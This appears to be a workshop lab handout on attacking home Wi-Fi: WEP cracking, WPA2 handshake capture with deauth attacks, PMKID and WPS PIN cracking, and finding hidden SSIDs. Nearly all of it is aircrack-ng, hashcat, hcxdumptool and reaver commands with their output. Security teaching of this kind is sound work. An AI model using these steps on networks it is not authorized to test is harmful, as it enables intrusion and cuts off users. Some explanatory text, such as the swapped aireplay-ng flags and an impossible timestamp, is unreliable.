---
tags: 'workshop'
---
Wi-Fi Hacking Lab
===
<i class="fa fa-file-pdf-o" aria-hidden="true"></i> **Wi-Fi Hacking Lab**
<i class="fa fa-user-circle-o" aria-hidden="true"></i> Johnny Pan
<i class="fa fa-clock-o" aria-hidden="true"></i> 2022-10-08
<i class="fa fa-external-link" aria-hidden="true"></i>
:::info
This lab was created for educational purposes and thinking to improve and to audit the security of the following wireless networks:
- Wired equivalent privacy (WEP)
- Wi-Fi Protected Access (WPA)
- Wi-Fi Protected Access v2 (WPA2)
:::
:::danger
Do it in your own wireless network.
:::
[TOC]
## Wireless hacking concepts
- WEP
- WPA
- WPA2
- Monitor Mode
- Promiscous Mode
- Packet Injection
- 4-way handshake
- [EAPOL](https://vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/)
## Requirements
- Wi-Fi AP/Router
- Wi-Fi Adapter
- Aircrack-NG suite
- Linux OS
## Hacking WEP
### Changing to root user
```bash!
[codeskill@wireless ~]$ sudo su
```
### Identifying the wireless adapter
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Enabling monitor mode
**Option #1 - Using ifconfig**
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```
**Option #2 - Using Airmong-ng**
```bash!
[root@wireless ~]# airmon-ng check wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
494 NetworkManager
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng check kill
Killing these processes:
PID Name
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
```
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Changing MAC address
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```
### Selecting WEP encrypted SSID
```bash!
[root@wireless ~]# airodump-ng wlan0mon --encrypt wep
CH 6 ][ Elapsed: 48 s ][ 2022-10-09 23:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -40 26 0 0 11 54e WEP WEP OPENSOURCE
```
### Packet injection
```bash!
[root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28
[00:21:02] Let's ride
[00:21:02] Resuming from besside.log
[00:21:02] Appending to wpa.cap
[00:21:02] Appending to wep.cap
[00:21:02] Logging to besside.log
[00:21:02] | Scanning chan 06
[00:21:02] / Scanning chan 06
[00:21:02] / Attacking [OPENSOURCE] WEP - PING
[00:21:02] - Attacking [OPENSOURCE] WEP - PING
...
[00:21:03] Associated to OPENSOURCE AID [1]
[00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY
...
[00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
...
[00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
...
[00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64
[00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64
[00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64
[00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs
[00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec
[00:42:56] TO-OWN [] OWNED [OPENSOURCE]
[00:42:56] All neighbors owned
```
### Cracking wep.cap file
```bash
[root@wireless ~]# aircrack-ng ./wep.cap
Aircrack-ng 1.7
[00:00:01] Tested 67097 keys (got 45009 IVs)
KB depth byte(vote)
0 0/ 1 BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920)
1 0/ 35 53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432)
2 0/ 3 9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688)
3 0/ 3 DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944)
4 206/214 AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472)
KEY FOUND! [ BF:53:9E:DB:37 ]
Decrypted correctly: 100%
```
## Hacking WPA/WPA2
### Changing to root user
```bash!
[codeskill@wireless ~]$ sudo su
```
### Identifying the wireless adapter
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Enabling monitor mode
**Option #1 - Using ifconfig**
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up
```
**Option #2 - Using Airmong-ng**
```bash!
[root@wireless ~]# airmon-ng check wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
494 NetworkManager
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng check kill
Killing these processes:
PID Name
1944 wpa_supplicant
```
```bash!
[root@wireless ~]# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
```
```bash!
[root@wireless ~]# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
```
### Changing MAC address
```bash!
[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up
```
### Selecting WPA/WPA2 encrypted SSID
```bash
[root@wireless ~]# airodump-ng wlan0mon
CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -50 41 6 0 6 54e WPA2 CCMP PSK OPENSOURCE
BE:A7:B9:14:DB:98 -57 40 0 0 6 130 WPA2 CCMP PSK ARTEMIS
BA:A7:B9:14:DB:98 -54 41 0 0 6 130 WPA2 CCMP PSK NARUTO
B6:A7:B9:14:DB:98 -57 42 0 0 6 130 WPA2 CCMP PSK TOTORO
B0:A7:B9:14:DB:98 -57 39 0 0 6 130 WPA2 CCMP PSK YOSHI
62:AF:97:C2:4E:24 -33 37 0 0 6 130 WPA2 CCMP PSK ARTEMIS
5E:AF:97:C2:4E:24 -33 40 0 0 6 130 WPA2 CCMP PSK NARUTO
5A:AF:97:C2:4E:24 -34 41 0 0 6 130 WPA2 CCMP PSK TOTORO
54:AF:97:C2:4E:24 -33 42 0 0 6 130 WPA2 CCMP PSK YOSHI
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -31 0 - 1e 0 23
```
### Monitor the network for a handshake
We press **`Ctrl+C`** and review the list of SSIDs. We look for the one we are interested in auditing. In this case we are going to work with ==OPENSOURCE==.
A `handshake` occurs when an item connects to a network (e.g., when your computer connects to a router). You need to wait until a handshake occurs so you capture the data necessary to crack the password. To start monitoring, run the following command:
**airodump --channel ==<CHANNEL>== --bssid ==<MAC-AP>== -w ==<CAPTURE-FILE>== wlan0mon**
In our case the values are the following:
**CHANNEL** = 6
**MAC-AP** = 00:18:39:E4:61:28
**CAPTURE-FILE** = wpa2
As long as this command stays running, you'll be monitoring for all connections and new handshakes.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 0 s ][ 2022-10-10 23:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -51 100 43 1 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
### Deauth attack
A deauth attack sends deauthentication packets to the router you're trying to break into, causing uses to disconnect and requiring them to log back in. When a user logs back in, you will be provided with a handshake. If you don't do a deauth attack, you might have to wait around for a long time for a handshake to complete, you'll need that handshake to crack the password.
If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step because you have what you need to crack the password and don't need to send deauth packets.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -48 100 690 31 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
Wait for something to connect to the network. Once you see two **BSSID** addresses appear next to each other one labeled BSSID (the Wi-Fi router) and the other labeled STATION (the computer or other device) this this means a client is connected. To force them into a handshake, you'll now send them deauth packets that kill their connection.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE
```
Open a new terminal. Make sure airodump-ng is still running in original terminal window, and drag it to another place on your desktop so both terminals are visible.
Send the deauth packets. Run this command, replacing STATION BSSID with the BSSID of the client that connected to the network, and NETWORK BSSID with the router's BSSID: aireplay-ng -0 2 -a STATION BSSID -c NETWORK BSSID mon0.
This command will send 2 deauth packets to disconnect the client from the network. Don't try to send more than this sending too many packets could prevent the client from reconnecting and generating the handshake.
As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client.
As soon as the client reconnects, all of the information you'll need to crack the password will be available.
```bash
[root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:47:41 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:47:41 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs]
23:47:42 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs]
```
### Cracking wpa2.cap file
When you see ==WPA handshake: <AP MAC ADDRESS>==, you can cracking the password.
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH 6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -49 100 3257 26 0 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
```
In the original terminal window, press Control+C to quit airodump-ng. This stops the dump and saves a file ending with .cap to your desktop.
Decompress the rockyou.txt wordlist. To crack the password, you'll need a wordlist. Fortunately, since you're using Kali Linux, you have several already in /usr/share/wordlists. The one we'll want to use is called rockyou.txt, but it's zipped up by default. To unzip it, run gzip -d /usr/share/wordlists/rockyou.txt.gz.
You won't be able to crack the password if it's not in the wordlist. You can always try one of the other wordlists if rockyou.txt doesn't crack the password.
```bash
apt install wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz
```
Run the command to crack the password. You'll use a tool called aircrack-ng, which come with Kali Linux, to do so. The command is aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap. Replace NETWORK BSSID with the BSSID for the router.
Depending on the strength of the password and the speed of your CPU, this process can take anywhere from a few hours to a few days.
If you're cracking static WEP key network instead of a WPA/WPA2-PSK network, replace -a2 with -a1.
```bash
[root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap
Aircrack-ng 1.7
[00:00:00] 2171/10303727 keys tested (5462.94 k/s)
Time left: 31 minutes, 25 seconds 0.02%
KEY FOUND! [ qwerty123 ]
Master Key : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16
92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A
```
## Hacking PMKID
### Installing the needed tools
```bash!
[root@wireless ~]# apt install hcxdumptool
[root@wireless ~]# apt install hcxtools
```
### Capturing PMKID packages
```bash
[root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy3
INTERFACE NAME............: wlan0
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack)
DRIVER....................: mt76x2u
DRIVER VERSION............: 5.18.0-kali7-amd64
DRIVER FIRMWARE VERSION...: 0.0.00-b1
openSSL version...........: 1.0
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: d85dfb0ab897
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63589
ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
TIME FREQ/CH MAC_DEST MAC_SOURCE ESSID [FRAME TYPE]
01:11:31 2442/7 6872c30f193c 54af97c24e24 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2]
01:11:47 2462/11 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2]
01:13:50 2412/1 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2]
01:13:54 2417/2 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2]
01:13:56 2422/3 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2]
01:14:00 2427/4 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2]
01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2]
01:14:08 2437/6 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2]
01:14:17 2447/8 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2]
01:16:17 5805/161 a86daa1620a1 54af97c24e25 SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2]
01:16:19 5805/161 1c4d660367fb 6aaf97c24e25 ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2]
```
### Converting PCAP file to Hashcat file
```bash
[root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng
hcxpcapngtool 6.2.7 reading from test.pcapng...
summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-kali7-amd64
application..............................: hcxdumptool 6.2.6
interface name...........................: wlan0
interface vendor.........................: 00c0ca
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client)
MAC CLIENT...............................: d85dfb0ab897
REPLAYCOUNT..............................: 63589
ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
timestamp minimum (GMT)..................: 14.10.2022 01:11:07
timestamp maximum (GMT)..................: 14.10.2022 01:23:11
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)...............: little endian
packets inside...........................: 3780
packets received on 2.4 GHz..............: 1637
packets received on 5 GHz................: 1754
ESSID (total unique).....................: 67
BEACON (total)...........................: 79
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11
BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161
BEACON (SSID wildcard/unset).............: 4
BEACON (SSID zeroed).....................: 2
ACTION (total)...........................: 33
ACTION (containing ESSID)................: 31
PROBEREQUEST.............................: 17
PROBEREQUEST (directed)..................: 2
PROBERESPONSE (total)....................: 59
AUTHENTICATION (total)...................: 75
AUTHENTICATION (OPEN SYSTEM).............: 75
ASSOCIATIONREQUEST (total)...............: 19
ASSOCIATIONREQUEST (PSK).................: 17
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 3435
EAPOL RSN messages.......................: 3435
EAPOLTIME gap (measured maximum usec)....: 1479862
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (suggested NC)...........: 2
EAPOL M1 messages (total)................: 2581
EAPOL M2 messages (total)................: 810
EAPOL M3 messages (total)................: 22
EAPOL M4 messages (total)................: 22
EAPOL pairs (total)......................: 8526
EAPOL pairs (best).......................: 17
EAPOL ROGUE pairs........................: 11
EAPOL pairs written to 22000 hash file...: 17 (RC checked)
EAPOL M12E2 (challenge)..................: 12
EAPOL M32E2 (authorized).................: 5
PMKID (useless)..........................: 40
PMKID (total)............................: 160
PMKID (best).............................: 6
PMKID ROGUE..............................: 5
PMKID written to 22000 hash file.........: 6
malformed packets (total)................: 3
BEACON error (total malformed packets)...: 3
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2412: 275 2417: 180 2422: 55 2427: 181
2432: 92 2437: 100 2442: 11 2447: 92
2452: 302 2457: 76 2462: 224 2467: 48
2472: 1 5180: 1220 5200: 3 5220: 164
5240: 139 5745: 1 5765: 71 5785: 59
5805: 95 5825: 2
session summary
---------------
processed pcapng files................: 1
```
### Cracking PMKID
```bash=
hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt'
Session..........: hashcat
Status...........: Running
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs)
Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8
Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts
Progress.........: 496666/186477005 (0.27%)
Rejected.........: 332644/496666 (66.98%)
Restore.Point....: 38204/14344385 (0.27%)
Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: september30 -> september22
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
```
## Hacking WPS
```bash
wash -i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID
--------------------------------------------------------------------------------
00:22:75:E2:8C:2A 1 -50 1.0 No RalinkTe OPENSOURCE
```
```bash
reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:22:75:E2:8C:2A
[+] Switching wlan0mon to channel 1
[+] Received beacon from 00:22:75:E2:8C:2A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
```
```bash
[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv
```
## How to discover hidden SSID
```bash
[root@wireless ~]# airodump-ng wlan0mon
CH 7 ][ Elapsed: 12 s ][ 2022-10-11 22:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -40 7 0 0 6 54e WPA2 CCMP PSK <length: 10>
62:AF:97:C2:4E:24 -34 7 0 0 6 130 WPA2 CCMP PSK ARTEMIS
5E:AF:97:C2:4E:24 -33 7 0 0 6 130 WPA2 CCMP PSK NARUTO
5A:AF:97:C2:4E:24 -34 9 0 0 6 130 WPA2 CCMP PSK TOTORO
54:AF:97:C2:4E:24 -33 9 0 0 6 130 WPA2 CCMP PSK YOSHI
```
<length: 10>
Capture packages
```bash
[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon
CH 6 ][ Elapsed: 24 s ][ 2022-10-11 22:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -43 100 265 0 0 6 54e WPA2 CCMP PSK <length: 10>
BSSID STATION PWR Rate Lost Frames Notes Probes
```
```bash
[root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28"
Running as user "root" and group "root". This could be dangerous.
2 0.055007 Cisco-Li_e4:61:28 → Broadcast 802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000
```
Open Wireshark
wlan.ta==00:18:39:E4:61:28
![](https://i.imgur.com/MSYPLeg.png)
```bash
[root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon
23:04:51 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs]
23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:54 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs]
23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs]
23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs]
23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs]
23:04:57 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs]
```
```bash
CH 6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE
BSSID STATION PWR Rate Lost Frames Notes Probes
00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE
```
## MAC Address Vendors
You can use the following link to identified the MAC address vendor
https://macvendors.com/
Or using the following command on Kali
```bash!
[root@wireless ~]# grep -i <FIRST 6 CHARS OF MAC ADDRESS> /var/lib/ieee-data/oui.txt
```
## Restore the services
```bash!
[root@wireless ~]# systemctl start NetworkManager.service
[root@wireless ~]# systemctl start wpa_supplicant.service
```
## References
- https://www.aircrack-ng.org/
- https://www.youtube.com/watch?v=knllpZF508k
- https://www.youtube.com/watch?v=_OyJ62fP648
- https://www.yeahhub.com/bypass-hidden-ssid-wireless-network-full-proof-method/